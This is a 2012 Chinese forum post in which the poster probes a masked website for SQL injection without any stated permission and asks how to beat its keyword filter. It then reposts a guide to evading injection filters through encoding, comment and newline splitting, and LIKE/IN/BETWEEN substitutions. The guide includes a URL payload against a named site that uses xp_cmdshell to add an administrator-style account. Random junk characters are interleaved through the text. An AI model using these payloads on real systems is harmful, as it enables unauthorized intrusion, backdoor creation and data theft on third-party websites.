路过这个网站,检测了一下.
6 K% N1 P5 W- v% \5 x0 l* H$ T$ chttp://www.xxx.cn/Article.asp?ID=117 and 1=1) l" g2 h5 `0 d7 w* N: G$ n. O/ y3 i
直接返回主页
3 P$ |( I; ^1 _( Q2 r6 C; Hhttp://www.xxx.cn/Article.asp?ID=117 or 1=1
4 J1 Y" W. _- Y- w直接返回主页3 c, X' N( [% r6 R9 ~
http://www.xxx.cn/Article.asp?ID=117 or
7 \4 a8 f" _ q: k9 q' ]没有返回主页 没有过滤or
$ [: g; B7 N# l5 }: w" k& Phttp://www.xxx.cn/Article.asp?ID=117 and; M. e7 b1 h. o! c- b
直接返回主页 看来过滤了and* G3 o* n3 b2 m* Y
http://www.xxx.cn/Article.asp?ID=117 or 1
( F, B3 H! s% O. T5 u, h3 T' X没有返回主页 即没有过滤or 也没有过滤14 P7 m* S& c5 H" {6 t+ |2 z
http://www.xxx.cn/Article.asp?ID=117 or 1=1
7 O( G* y0 A' G直接返回主页 很明显过滤了等号 3 L' T% x1 ?7 Z, Y+ d6 B3 X7 @7 v0 r
or的特性是与and相反的.
, W; _1 F; q( o/ z+ c' z( b. g1 J' oor 1=1 爆错 或与原页面不同. z) A3 b) @4 `0 u$ b8 p
or 1=2 原页面相同
0 J, b: O' f! W! ^$ {. o" Q7 B这样就是一个注入点% m, P3 G" h1 E! n& O
但他过滤了=号 我就用><号代替=号吧!1 F6 {, z7 A+ l5 b& y% y/ N, d' o
or 1<2 很明显是正确的,所以应该与原页面不同8 v( [% [( ]( O7 r4 c
or 1>2 很明显是错误的,所以应该与原页面相同+ G3 E/ e: ^5 j& I: o
然后看看有没有过滤其他的查询语句,比如select. w% Y! K' S1 h6 s% l6 L
http://www.xxx.cn/Article.asp?ID=117 select$ n$ q2 C" j8 z
直接返回主页& Y! C* |; G! v/ g- Y; E: C; S
又迷茫了..
; v7 a2 w( T7 _- g
" D- u. \" O) \( b- _3 \( k, Y8 N" M: ~" G) P8 y N
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗8 h. ~8 m" I% g4 B
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
; H% R4 M; p# n% J/ o/ t================================================6 I8 e, t$ Q! M1 X# b6 J! M% Z& P
以下是转贴:6 C$ L% @2 S& G) C+ b) v
7 k" h. Z$ o2 g! M% w5 H突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… $ j/ {0 P; [7 a, y: X9 F$ W' I
经过我的收集,大部分的防注入程序都过滤了以下关键字: & q1 h9 T6 b- R$ {% o
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
# j* ]- x) V. i; ?6 o' P3 C而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 $ l; B. v! k' X1 j/ S6 m
对于关键字的过滤,以下是我收集的以及我个人的一些想法。
1 C& L- I' @/ v y! Z- ?- D: S1、运用编码技术绕过
& k" b. x; F0 r0 u8 j如URLEncode编码,ASCII编码绕过。例如or 1=1即
3 d9 i; \7 m5 z/ g- ]' N3 Q%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 4 }: m1 U+ X. t' }5 d
~# Z7 {5 J8 { `7 j2、通过空格绕过
8 f! D, ]/ C' _$ c0 [' ^" q如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 1 E Y" X5 U) ^$ ~1 A2 }1 T
or’ swords’ =‘swords’ * f* W; o0 _* `- ~. N9 E
,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。
+ v% V! q4 B8 W3、运用字符串判断代替 % u7 q) N: J6 @1 q6 V$ m4 N
用经典的or 1=1判断绕过,如
* `6 H8 q- X% x b$ lor ’swords’ =’swords’
3 [+ B3 X) K7 i' ]2 y,这个方法就是网上在讨论的。 ' M w- X- ?" _& L1 I1 [. w( @
4、通过类型转换修饰符N绕过
* L# `& L5 \0 F( j' p. q( E7 W+ g可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
+ ~2 r" r& L6 k7 O9 |! ^8 j5、通过+号拆解字符串绕过 2 d+ X7 N5 V* o a
效果值得考证,但毕竟是一种方法。如 . m; b6 F/ ?" K! ?2 Q- G3 X. d f# |
or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ )
" k" j7 H4 v1 V' d) P
" G, x+ f: c7 M" e2 e, t- S- ~6、通过LIKE绕过 # g% I: b4 ?, g; j4 C' g4 x( J
以前怎么就没想到呢?如or 8 O! i; j! w! Q) F2 G: e
’swords’ LIKE ’sw’ ; I$ d* ^" _% {
!!!显然可以很轻松的绕过 $ c4 n* ]7 @" h, F1 M+ I9 I4 d
“=”“>”
# P' W1 _. L0 N+ y的限制……
5 u- s) c9 I" D6 m+ C' b ^0 f5 N7、通过IN绕过
{; I* T; K4 q5 X' Q与上面的LIKE的思路差不多,如 ' }! j6 w7 [0 Q1 V( {7 @
or ’swords’ IN (’swords’)
5 H% X7 v* Q+ ?; Z% e0 M$ ~; G1 K
8、通过BETWEEN绕过
9 V4 f. h1 H& Y; Y) y* M如 . M0 \# t1 ]6 @: D0 G: Y" k- {+ G% t
or ’swords’ BETWEEN ’rw’ AND ’tw’ 1 [' B9 C) B+ I8 P. c4 e
4 w2 v( [$ ~0 A9、通过>或者<绕过 , p4 {0 A2 Y6 h; |2 D
or ’swords’ > ’sw’
% N$ z4 ]: {- B" f9 xor ’swords’ < ’tw’ 7 n L, H8 x4 y8 g
or 1<3
+ w7 a% E3 h; b5 U+ j. E* B…… , ?1 X3 U: ~& l' ]- [" I
10、运用注释语句绕过 * F4 y y, t: B+ M6 a5 s1 g& ?/ r" |
用/**/代替空格,如:
7 S' P2 I. I% h' w) P! ~0 BUNION /**/ Select /**/user,pwd,from tbluser + ^) j! v/ }$ I" ~! Z
! i6 H. \& d% C, O) \* S! c
用/**/分割敏感词,如:
2 H& |7 E2 B2 ]$ X. @6 z( Q/ h* gU/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser $ ~1 J8 \: d: {# n, o. w
$ P9 w/ Q( |' F9 e- a: @" z9 `11、用HEX绕过,一般的IDS都无法检测出来 . v1 [' Y- q) A
0x730079007300610064006D0069006E00 =hex(sysadmin)
# N( a5 p/ q4 i X0 I9 k0x640062005F006F0077006E0065007200 =hex(db_owner)
* n$ g7 w+ B, g% X# m. ^另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
/ k9 r( W( Q W declare @a sysname
7 b1 R: P# ?# i( |6 B select @a= . g0 q, @/ M6 D, q3 T/ G
exec master.dbo.xp_cmdshell @a 5 Z& E7 d* f# d4 Z
效果 2 ~6 J7 Y/ S, h" a/ F
http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- / `- r/ M9 B1 F9 J- M
U3 Z# f' A) |9 ?! m其中的 7 T; n' y0 A! @
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 . g# e$ H( g' {/ H J8 G# R
就是
& F2 t# c" H: G$ }- r8 p“net user angel pass /add”
5 I- {7 a& @( o+ d3 m" D& B+ F# c' Y0 X$ F" l1 p; E
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。, Z% j$ ?. v d* \7 o
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。8 A6 M9 m2 o* g" H0 X
另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似 w) k: t' ?1 s" H3 ]! x
Copy code* s8 h. M8 l2 Z
select * from table exec xp_cmdshell'xxxxxxxxxx'
- _, H# a, ~. q9 {5 U; B' i2 ]% H: N- w
3 t7 M& E7 V9 C3 H) K. Z7 c2 Q
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'5 l5 V5 ?( l( G/ I
V. O, D/ D& A( F( d" U) w5 w0 u/ H! v7 [" I1 c v
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'. o- L2 U: Y; _: K: G# k
% t7 w G: k3 a2 o
3 K6 O' w1 K9 `select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'; w! s6 W3 o" [
8 ~0 {; M2 Z. u. i" P" e
的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?
7 D9 ?% Y/ H3 q7 @: h6 g- x2 x' ]' z, `/ c& [) A9 H
这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了
: m5 n. ]2 l- g2 ]1 u z9 Y# V" r可能大家早就知道了,不管怎么说,发在这里吧!; D6 I4 [& A- w" k8 l$ \: f
) v1 F" s! z" Z) j; z最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。- `7 q' J; F4 r% b/ @
4 E" K8 i U0 r0 m! u1 I$ I z* d Z( V5 j3 J/ f6 f
$ Z& B' J( t7 h6 B
对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,
% ~# J, M. k. p X2 T比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?
P/ @* K0 A2 G" A8 l/ Z; ]( K- N/ x) ^, {
|
发表于 2012-9-15 14:47:46
收藏
支持
反对